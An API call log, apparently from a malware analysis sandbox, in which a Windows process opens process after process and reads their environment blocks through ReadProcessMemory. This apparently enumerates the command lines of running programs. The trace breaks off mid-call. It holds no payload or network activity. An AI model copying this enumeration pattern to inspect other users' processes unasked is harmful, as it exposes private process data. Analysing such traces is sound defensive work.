[0264.655] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.656] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1014) returned 0x28c [0264.656] GetLastError () returned 0x0 [0264.656] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.656] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x322018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.657] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.657] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5d1c40, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.657] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5d1888, lpBuffer=0x138c580, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.657] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.657] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.658] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x322020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.658] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5d1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.658] malloc (_Size=0x5e) returned 0xdb03b0 [0264.658] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5d18de, lpBuffer=0xdb03b0, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb03b0*, lpNumberOfBytesRead=0x0) returned 1 [0264.658] free (_Block=0xdb03b0) [0264.659] CloseHandle (hObject=0x28c) returned 1 [0264.659] _ui64tow_s (in: _Value=0x101c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4124") returned 0x0 [0264.659] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4124") returned 4 [0264.659] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.659] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.660] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x101c) returned 0x28c [0264.660] GetLastError () returned 0x0 [0264.660] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.660] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x22f018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.661] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.661] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x551c30, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.661] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x551888, lpBuffer=0x138c580, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.661] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.661] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.661] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x22f020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.662] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x551270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.662] malloc (_Size=0x5a) returned 0xdb03b0 [0264.662] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5518da, lpBuffer=0xdb03b0, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb03b0*, lpNumberOfBytesRead=0x0) returned 1 [0264.662] free (_Block=0xdb03b0) [0264.663] CloseHandle (hObject=0x28c) returned 1 [0264.663] _ui64tow_s (in: _Value=0x1024, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4132") returned 0x0 [0264.663] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4132") returned 4 [0264.663] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.663] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.667] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1024) returned 0x28c [0264.667] GetLastError () returned 0x0 [0264.667] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.667] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x333018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.667] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.667] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x521ca0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.667] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x521888, lpBuffer=0x138c580, nSize=0x78, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.668] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.668] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.668] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x333020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.668] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x521270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.668] malloc (_Size=0x80) returned 0xd9d190 [0264.668] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x521900, lpBuffer=0xd9d190, nSize=0x7e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.669] free (_Block=0xd9d190) [0264.669] CloseHandle (hObject=0x28c) returned 1 [0264.669] _ui64tow_s (in: _Value=0x102c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4140") returned 0x0 [0264.670] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4140") returned 4 [0264.670] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.670] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.671] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x102c) returned 0x28c [0264.671] GetLastError () returned 0x0 [0264.671] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.671] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2d9018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.671] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.671] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x441c70, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.671] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x441888, lpBuffer=0x138c580, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.672] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.672] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.672] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2d9020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.672] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x441270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.714] malloc (_Size=0x6e) returned 0xd9d190 [0264.714] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4418ee, lpBuffer=0xd9d190, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.715] free (_Block=0xd9d190) [0264.715] CloseHandle (hObject=0x28c) returned 1 [0264.715] _ui64tow_s (in: _Value=0x1034, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4148") returned 0x0 [0264.715] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4148") returned 4 [0264.716] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.716] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.717] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1034) returned 0x28c [0264.717] GetLastError () returned 0x0 [0264.717] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.717] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x275018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.717] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.717] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x461cc0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.717] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x461888, lpBuffer=0x138c580, nSize=0x7e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.718] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.718] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.718] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x275020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.718] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x461270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.718] malloc (_Size=0x86) returned 0xd9d190 [0264.718] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x461906, lpBuffer=0xd9d190, nSize=0x84, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.719] free (_Block=0xd9d190) [0264.719] CloseHandle (hObject=0x28c) returned 1 [0264.720] _ui64tow_s (in: _Value=0x103c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4156") returned 0x0 [0264.722] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4156") returned 4 [0264.722] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.723] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.724] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x103c) returned 0x28c [0264.724] GetLastError () returned 0x0 [0264.724] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.724] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3a5018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.724] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.724] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5f1c70, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.724] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5f1888, lpBuffer=0x138c580, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.725] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.725] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.725] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3a5020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.725] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5f1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.726] malloc (_Size=0x6e) returned 0xd9d190 [0264.726] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5f18ee, lpBuffer=0xd9d190, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.727] free (_Block=0xd9d190) [0264.727] CloseHandle (hObject=0x28c) returned 1 [0264.727] _ui64tow_s (in: _Value=0x1098, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4248") returned 0x0 [0264.728] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4248") returned 4 [0264.728] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.728] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.729] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1098) returned 0x28c [0264.729] GetLastError () returned 0x0 [0264.729] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.729] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x267018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.732] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.732] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b1c70, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.732] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b1888, lpBuffer=0x138c580, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.732] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.733] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.733] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x267020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.733] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.733] malloc (_Size=0x70) returned 0xd9d190 [0264.733] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b18f0, lpBuffer=0xd9d190, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.734] free (_Block=0xd9d190) [0264.734] CloseHandle (hObject=0x28c) returned 1 [0264.735] _ui64tow_s (in: _Value=0x1100, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4352") returned 0x0 [0264.735] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4352") returned 4 [0264.735] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.735] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.736] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1100) returned 0x28c [0264.736] GetLastError () returned 0x0 [0264.736] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.736] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x388018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.737] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.737] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x561ca0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.737] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x561888, lpBuffer=0x138c580, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.737] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.738] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.738] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x388020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.738] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x561270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.738] malloc (_Size=0x7e) returned 0xd9d190 [0264.738] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5618fe, lpBuffer=0xd9d190, nSize=0x7c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.739] free (_Block=0xd9d190) [0264.739] CloseHandle (hObject=0x28c) returned 1 [0264.739] _ui64tow_s (in: _Value=0x1108, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4360") returned 0x0 [0264.739] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4360") returned 4 [0264.739] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.739] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1108) returned 0x28c [0264.741] GetLastError () returned 0x0 [0264.741] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.741] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x501018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) 